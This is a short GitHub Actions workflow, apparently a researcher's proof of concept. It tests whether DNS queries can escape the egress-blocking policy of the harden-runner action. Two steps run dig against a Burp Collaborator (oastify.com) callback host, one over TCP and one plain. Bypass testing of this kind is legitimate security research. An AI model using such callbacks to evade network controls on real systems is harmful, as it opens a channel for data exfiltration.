name: PoC #test
on: [push, workflow_dispatch]
jobs:
  bypass-firewall:
    runs-on: ubuntu-22.04
    steps:


      - uses: step-security/harden-runner@c6295a65d1254861815972266d5933fd6e532bdf
        with:
          egress-policy: block
          disable-sudo: true
          allowed-endpoints: >
            github.com:443

      - name: Checkout repository
        uses: actions/checkout@v4 # This action handles cloning the repository


      - name: Test bypass
        run: dig 3uyw685t6ljonrg7pwm9m081ssyjmfa4.oastify.com +tcp

      - name: Test bypass 2
        run: dig 3uyw685t6ljonrg7pwm9m081ssyjmfa4.oastify.com
     
          
      
